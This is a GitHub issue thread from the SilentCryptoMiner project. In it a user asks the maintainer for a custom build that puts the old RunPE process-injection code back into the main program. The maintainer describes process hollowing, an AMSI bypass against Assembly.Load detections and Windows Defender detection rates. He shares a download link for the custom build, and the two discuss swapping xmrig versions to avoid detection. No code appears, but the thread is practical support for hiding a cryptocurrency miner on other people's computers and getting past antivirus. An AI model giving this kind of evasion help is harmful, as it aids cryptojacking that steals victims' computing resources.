### ISSUE TITLE
Run Pe

### ISSUE THREAD

**Issue by masterjek** [UnamSanctam/SilentCryptoMiner#1045]
Good evening Unam. Can you please give me the project where Run PE located in the main code? As always, I will encrypt the miner separately. And the main program itself to run it.

**Comment by UnamSanctam** [comment]
Sure, though the new RunPE (called ProcessInject.dll) is a library written in C++ which is then loaded into memory with a C# library I called DllLoader.dll. Which means that I can't put that into the main code, so the alternative would be to use the old RunPE instead of the new one. This also means that you won't be able to use the "Critical Processes (BSoD)" option since that is also a C++ library loaded in the same way. So I can replace the new injection library/technique with the old RunPE method and send that if you want that.

**Comment by masterjek** [comment]
I will not be using "Critical Processes (BSoD)". So if you can give me a new version, but with the old Run PE. You can find out more, but the new virus detection Windows Defender Accidentally not in code Run PE.

**Comment by UnamSanctam** [comment]
>I will not be using "Critical Processes (BSoD)". So if you can give me a new version, but with the old Run PE

Sure I'll make one with the old RunPE soon, I just have some things to do first.

>You can find out more, but the new virus detection Windows Defender Accidentally not in code Run PE.

What do you mean? But the new process hollowing was done quite long before the new detection was added, mainly to avoid the Assembly.Load detections that were appearing, I bypassed them temporarily using an AMSI Bypass but in the future they could add a new form of detection or release a new AMSI update that invalidates the current AMSI bypasses.

**Comment by masterjek** [comment]
> Конечно, я скоро сделаю его со старым RunPE, просто мне нужно кое-что сделать в первую очередь.

Ok thanks a lot, I'll wait.



> Что ты имеешь в виду? Но новые процессы удаления были завершены до того, как было добавлено новое обнаружение, в основном для того, чтобы избежать появляющихся обнаружений Assembly.Load, я временно обошел их с помощью обхода AMSI, но в будущем они могут добавить новое обнаружение или выпуск. новое обновление AMSI, которое делает недействительными текущие обходы AMSI.

I'm just writing through a translator. Maybe you misunderstood my question. I mean. When you give me a new version with the old Run PE it will have a new virus detection Windows Defender?

**Comment by UnamSanctam** [comment]
>I'm just writing through a translator. Maybe you misunderstood my question. I mean. When you give me a new version with the old Run PE it will have a new virus detection Windows Defender?

Ahh now I get what you mean, the old RunPE won't have any difference in detections compared to before that I know of, especially since you use it directly in the file.

**Comment by UnamSanctam** [comment]
Here: https://anonfiles.com/6aC4w648y8/SilentCryptoMiner_2.6.0_CUSTOM_zip, this should work.

**Comment by masterjek** [comment]
Thank you very much. I'm asking here so I don't open a new thread. In the new xmrig which is in the version 2.6.0. There are a lot of virus detections and it is difficult to encrypt them. In new version 2.6.0 I took xmgir From version 2.5.0. I checked, the new version started with the old version xmrig. Can I use it like this? Errors should not appear due to the use of version 2.6.0 with the old xmrig.

**Comment by UnamSanctam** [comment]
Yes you can, there aren't a lot of differences for xmrig, only the xmrig update from 6.17.0 to 6.18.0. Seems like it's the opposite for me, the new xmrig has much less detections overall for me, especially on Windows Defender.

**Comment by masterjek** [comment]
Thanks for the help.

**Comment by masterjek** [comment]
The new update came out so fast. Can you please give me the project where Run PE located in the main code? As always, I will encrypt the miner separately. And the main program itself to run it.

**Comment by UnamSanctam** [comment]
Sure, though you actually only really need to replace the ethminer.zip with the new one https://github.com/UnamSanctam/SilentCryptoMiner/blob/master/SilentCryptoMiner/Resources/Miners/ethminer.zip, it's the only change that you will use (other change was to the "Critical Processes" but you don't use that).

**Comment by masterjek** [comment]
Thank you very much for the information.
